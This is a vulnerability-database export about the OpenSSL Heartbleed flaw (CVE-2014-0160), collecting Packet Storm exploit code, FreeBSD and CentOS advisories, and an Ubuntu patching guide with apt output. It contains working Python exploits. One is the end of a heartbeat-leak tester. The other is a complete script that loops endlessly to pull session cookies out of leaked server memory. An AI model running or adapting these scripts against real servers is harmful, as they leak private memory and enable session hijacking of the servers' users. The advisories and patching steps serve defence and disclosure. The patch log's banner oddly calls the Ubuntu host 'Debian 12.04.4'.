\ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126070/ssltest.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:25:28", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-09T00:00:00", "published": "2014-04-09T00:00:00", "href": "https://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html", "id": "PACKETSTORM:126069", "type": "packetstorm", "title": "Heartbleed User Session Extraction", "sourceData": "`#!/usr/bin/python \n \n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. \n# Michael Davis (mike.philip.davis@gmail.com) \n \n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n \n# The author disclaims copyright to this source code. \n \nimport select \nimport sys \nimport string \nimport struct \nimport socket \nimport time \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)') \n \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \n \nclass HeartBleeder(object): \n \nserver_response = None \nsocket = None \nhostname = '' \nport = 443 \nfound_sessions = set() \ncookie = 'session' \ncookie_length = 56 \n \ndef __init__(self, hostname='', cookie=''): \nself.hostname = hostname \nself.cookie = cookie \n \ndef connect(self): \n\"\"\" \nConnects to the remote server. \n\"\"\" \nself.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsys.stdout.flush() \nself.socket.connect((self.hostname, self.port)) \nsys.stdout.flush() \nself.socket.send(hello) \nsys.stdout.flush() \n \ndef rcv_response(self): \nwhile True: \n_type, version, payload = self.rcv_message() \nif _type is None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif _type == 22 and ord(payload[0]) == 0x0E: \nbreak \n \ndef rcv_message(self): \n \nrecord_header = self.rcv_all(5) \nif record_header is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \n_type, version, line = struct.unpack('>BHH', record_header) \npayload = self.rcv_all(line, 10) \nif payload is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \n# print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn _type, version, payload \n \ndef rcv_all(self, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([self.socket], [], [], 5) \nif self.socket in r: \ndata = self.socket.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \ndef try_heartbeat(self): \nself.socket.send(hb) \nwhile True: \n_type, version, self.payload = self.rcv_message() \nif _type is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif _type == 24: \n# print 'Received heartbeat response:' \nself.parse_response() \nif len(self.payload) > 3: \npass \n# print 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif _type == 21: \nprint 'Received alert:' \nself.hexdump(self.payload) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef parse_response(self): \n\"\"\" \nParses the response from the server for a session id. \n\"\"\" \nascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload) \nindex = string.find(ascii, self.cookie) \nif index >= 0: \ninfo = ascii[index:index + self.cookie_length] \nsession = info.split(' ')[0] \nsession = string.replace(session, ';', '') \nif session not in self.found_sessions: \nself.found_sessions.add(session) \nprint session \n \ndef hexdump(self, payload): \n\"\"\" \nPrints out a hexdump in the event that server returns an error. \n\"\"\" \nfor b in xrange(0, len(payload), 16): \nline = [c for c in payload[b:b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in line) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef scan(self): \nself.connect() \nself.rcv_response() \nself.try_heartbeat() \n \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ncookies_str = 'session' \nif len(args) > 1: \ncookies_str = args[1] \n \nprint cookies_str \n \nwhile True: \nheartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str) \nheartbeat.scan() \n \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126069/heartbleed-altered.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:29", "bulletinFamily": "unix", "description": "\nOpenSSL Reports:\n\nA missing bounds check in the handling of the TLS heartbeat extension can be\n\t used to reveal up to 64k of memory to a connected client or server.\nAffected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately\n\t upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.\n\n\nThe bug allows anyone on the Internet to read the memory of the\n\t systems protected by the vulnerable versions of the OpenSSL software.\n\t This compromises the secret keys used to identify the service\n\t providers and to encrypt the traffic, the names and passwords of the\n\t users and the actual content. This allows attackers to eavesdrop\n\t communications, steal data directly from the services and users and\n\t to impersonate services and users.\n\n\nThe code used to handle the Heartbeat Extension does not do\n\t sufficient boundary checks on record length, which allows reading\n\t beyond the actual payload.\n\n", "modified": "2014-04-11T00:00:00", "published": "2014-04-07T00:00:00", "id": "5631AE98-BE9E-11E3-B5E3-C80AA9043978", "href": "https://vuxml.freebsd.org/freebsd/5631ae98-be9e-11e3-b5e3-c80aa9043978.html", "title": "OpenSSL -- Remote Information Disclosure", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "centos": [{"lastseen": "2019-12-20T18:23:55", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2014:0376\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/032287.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0376.html", "modified": "2014-04-08T02:54:58", "published": "2014-04-08T02:54:58", "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/032287.html", "id": "CESA-2014:0376", "title": "openssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "vulnerlab": [{"lastseen": "2019-05-29T17:28:54", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-09T00:00:00", "published": "2014-04-09T00:00:00", "id": "VULNERLAB:1254", "href": "http://www.vulnerability-lab.com/get_content.php?id=1254", "title": "HeartBleed SSL CVE 20140160 - 10 Steps to Fix in Ubuntu", "type": "vulnerlab", "sourceData": "Document Title:\r\n===============\r\nHeartBleed SSL CVE 20140160 - 10 Steps to Fix in Ubuntu\r\n\r\n\r\n\r\nRelease Date:\r\n=============\r\n2014-04-09\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1254\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nReport\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nHow to Fix the HeartBleed SSL Vulnerability (CVE-2014-0160) in Ubuntu with 10 easy steps!\r\n\r\n1. First we login via terminal console to the ssh port (22)\r\n2. Now, we use sudo or su to auth to work with root privileges\r\n3. After the privileges upgrade to root we type `apt-get update` to update all installed core packages\r\n4. Next command is `apt-get upgrade` to upgrade the already installed linux software packages\r\n5. Now, we reboot the system with the following basic command `sudo reboot`\r\n6. After the startup we access the server again via ssh client to port 22\r\n7. We install the development package and upgrade the library itself via the following terminal command `sudo apt-get install openssl libssl-dev`\r\n7. As next command we type in the command line `openssl version` (1.0.1) to review the newst installed version and package name\r\n9. The following 2 commands shows all affected services that need to be restarted `ps uwwp $(sudo find /proc -maxdepth 2 -name maps -exec grep -HE `/libssl.so.* (deleted)` {} ; | cut -d/ -f3 | sort -u)`\r\nor still running `ls -l /proc/*/fd | grep ssl.*(deleted)`\r\n10. Last step is to reboot by usage of the basic `sudo reboot` to ensure the updates and upgrades was successful\r\n\r\n\r\n\r\nMay delete or overwirte important exisiting data\r\napt-get purge openssl\r\n\r\nClean the system automatically\r\napt-get autoremove && apt-get autoclean\r\n\r\nDownload and compile the newst version of openssl\r\nwget https://www.openssl.org/source/openssl-1.0.1g.tar.gz\r\n\r\nInspect what is causing an error to pin - Old Repository & Co.\r\napt-cache policy openssl libssl-dev\r\n\r\nNote: Remember that a verified certificate needs to be revoked to generate a new after a compromise.\r\n\r\n\r\n------------- Reboot\r\nanalyst-updater@h2072833:~#\r\nlogin as: analyst-updater\r\nanalyst-updater@h2072833.ben-kenobi-server.net\\'s password:\r\nWelcome to Debian 12.04.4 (GNU/Linux x86_64)\r\nLast login: Wed Apr 9 12:00:55 2014 from xxx.dip0.ipconnect.com\r\n\r\nanalyst-updater@h2072833:~# openssl version\r\nOpenSSL 1.0.1 14 Mar 2012\r\n\r\nanalyst-updater@h2072833:~# apt-get update\r\nHit ftp://ftp.ben-kenobi-server.net precise Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise-security Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise Release\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates Release\r\nHit ftp://ftp.ben-kenobi-server.net precise-security Release\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe TranslationIndex\r\nGet:1 ftp://ftp.ben-kenobi-server.net precise/main Translation-en_GB [96.4 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Translation-de\r\nGet:2 ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-en_GB [79.8 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-de\r\nGet:3 ftp://ftp.ben-kenobi-server.net precise/restricted Translation-en_GB [2,406 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted Translation-de\r\nGet:4 ftp://ftp.ben-kenobi-server.net precise/universe Translation-en_GB [5,492 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Translation-de\r\nGet:5 ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-en_GB [96.4 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-de\r\nGet:6 ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-en_GB [79.8 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-de\r\nGet:7 ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-en_GB [2,406 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-de\r\nGet:8 ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-en_GB [5,492 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-de\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe Translation-en\r\nFetched 368 kB in 0s (808 kB/s)\r\nReading package lists... Done\r\n\r\nanalyst-updater@h2072833:~# apt-get upgrade\r\nReading package lists... Done\r\nBuilding dependency tree\r\nReading state information... Done\r\n0 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.\r\n1 not fully installed or removed.\r\nAfter this operation, 0 B of additional disk space will be used.\r\nDo you want to continue [Y/n]? y\r\n apache2 apache2-mpm-prefork apache2-prefork-dev apache2-utils apache2.2-bin\r\n apache2.2-common ca-certificates clamav clamav-base clamav-freshclam file\r\n icedtea-6-jre-cacao icedtea-6-jre-jamvm ifupdown initramfs-tools\r\n initramfs-tools-bin libapache2-mod-php5 libclamav6 libgtk-3-0 libgtk-3-bin\r\n libgtk-3-common libgudev-1.0-0 libgudev-1.0-0:i386 libmagic1 libnss3\r\n libnss3:i386 libnss3-1d libpq-dev libpq5 librsvg2-2:i386\r\n librsvg2-common:i386 libssl-dev libssl-doc libssl1.0.0 libssl1.0.0:i386\r\n libudev0 libudev0:i386 linux-firmware openjdk-6-jre-headless\r\n openjdk-6-jre-lib openssh-client openssh-server openssl php5 php5-cgi\r\n php5-cli php5-common php5-curl php5-gd php5-mysql php5-sqlite php5-xsl\r\n postgresql-9.1 postgresql-client-9.1 sudo tzdata tzdata-java udev udisks\r\n59 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.\r\n1 not fully installed or removed.\r\nNeed to get 108 MB of archives.\r\nAfter this operation, 4,201 kB of additional disk space will be used.\r\nDo you want to continue [Y/n]? y\r\nGet:1 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl-d oc all 1.0.1-4ubuntu5.12 [1,032 kB]\r\nGet:2 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl-d ev amd64 1.0.1-4ubuntu5.12 [1,575 kB]\r\nGet:3 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl1. 0.0 i386 1.0.1-4ubuntu5.12 [1,009 kB]\r\nGet:4 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl1. 0.0 amd64 1.0.1-4ubuntu5.12 [1,048 kB]\r\nGet:5 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libudev0 i386 175-0ubuntu9.5 [32.1 kB]\r\nGet:6 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libudev0 amd64 175-0ubuntu9.5 [28.4 kB]\r\nGet:7 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -bin amd64 3.4.2-0ubuntu0.7 [15.9 kB]\r\nGet:8 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -0 amd64 3.4.2-0ubuntu0.7 [2,285 kB]\r\nGet:9 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -common all 3.4.2-0ubuntu0.7 [145 kB]\r\nGet:10 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgude v-1.0-0 i386 1:175-0ubuntu9.5 [14.6 kB]\r\nGet:11 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgude v-1.0-0 amd64 1:175-0ubuntu9.5 [14.5 kB]\r\nGet:12 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 -1d amd64 3.15.4-0ubuntu0.12.04.2 [13.4 kB]\r\nGet:13 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 i386 3.15.4-0ubuntu0.12.04.2 [1,292 kB]\r\nGet:14 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 amd64 3.15.4-0ubuntu0.12.04.2 [1,229 kB]\r\nGet:15 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main librsvg 2-common i386 2.36.1-0ubuntu1.1 [20.3 kB]\r\nGet:16 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main librsvg 2-2 i386 2.36.1-0ubuntu1.1 [109 kB]\r\nGet:17 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main file am d64 5.09-2ubuntu0.3 [19.7 kB]\r\nGet:18 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libmagi c1 amd64 5.09-2ubuntu0.3 [217 kB]\r\nGet:19 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main tzdata- java all 2014a-0ubuntu0.12.04 [126 kB]\r\nGet:20 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main tzdata all 2014a-0ubuntu0.12.04 [448 kB]\r\nGet:21 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cg i amd64 5.3.10-1ubuntu3.11 [6,104 kB]\r\nGet:22 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssl amd64 1.0.1-4ubuntu5.12 [523 kB]\r\nGet:23 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -prefork-dev amd64 2.2.22-1ubuntu1.5 [138 kB]\r\nGet:24 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 amd64 2.2.22-1ubuntu1.5 [1,494 B]\r\nGet:25 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -mpm-prefork amd64 2.2.22-1ubuntu1.5 [2,400 B]\r\nGet:26 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 .2-common amd64 2.2.22-1ubuntu1.5 [226 kB]\r\nGet:27 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 .2-bin amd64 2.2.22-1ubuntu1.5 [1,339 kB]\r\nGet:28 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -utils amd64 2.2.22-1ubuntu1.5 [91.3 kB]\r\nGet:29 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libapac he2-mod-php5 amd64 5.3.10-1ubuntu3.11 [3,137 kB]\r\nGet:30 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-my sql amd64 5.3.10-1ubuntu3.11 [76.6 kB]\r\nGet:31 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-xs l amd64 5.3.10-1ubuntu3.11 [14.0 kB]\r\nGet:32 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cu rl amd64 5.3.10-1ubuntu3.11 [28.0 kB]\r\nGet:33 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-gd amd64 5.3.10-1ubuntu3.11 [38.8 kB]\r\nGet:34 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cl i amd64 5.3.10-1ubuntu3.11 [3,051 kB]\r\nGet:35 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-sq lite amd64 5.3.10-1ubuntu3.11 [27.6 kB]\r\nGet:36 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-co mmon amd64 5.3.10-1ubuntu3.11 [1,797 kB]\r\nGet:37 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main icedtea -6-jre-cacao amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [776 kB]\r\nGet:38 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openjdk -6-jre-lib all 6b30-1.13.1-1ubuntu2~0.12.04.3 [6,211 kB]\r\nGet:39 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main icedtea -6-jre-jamvm amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [527 kB]\r\nGet:40 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openjdk -6-jre-headless amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [32.8 MB]\r\nGet:41 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main sudo amd64 1.8.3p1-1ubuntu3.6 [299 kB]\r\nGet:42 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main ifupdown amd64 0.7~beta2ubuntu11 [48.4 kB]\r\nGet:43 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main initramfs-tools all 0.99ubuntu13.5 [49.0 kB]\r\nGet:44 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main initramfs-tools-bin amd64 0.99ubuntu13.5 [9,782 B]\r\nGet:45 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main udev amd64 175-0ubuntu9.5 [314 kB]\r\nGet:46 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main ca-certificates all 20130906ubuntu0.12.04.1 [192 kB]\r\nGet:47 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssh-server amd64 1:5.9p1-5ubuntu1.3 [338 kB]\r\nGet:48 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssh-client amd64 1:5.9p1-5ubuntu1.3 [943 kB]\r\nGet:49 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libclamav6 amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [4,208 kB]\r\nGet:50 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav-base all 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [106 kB]\r\nGet:51 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav-freshclam amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [120 kB]\r\nGet:52 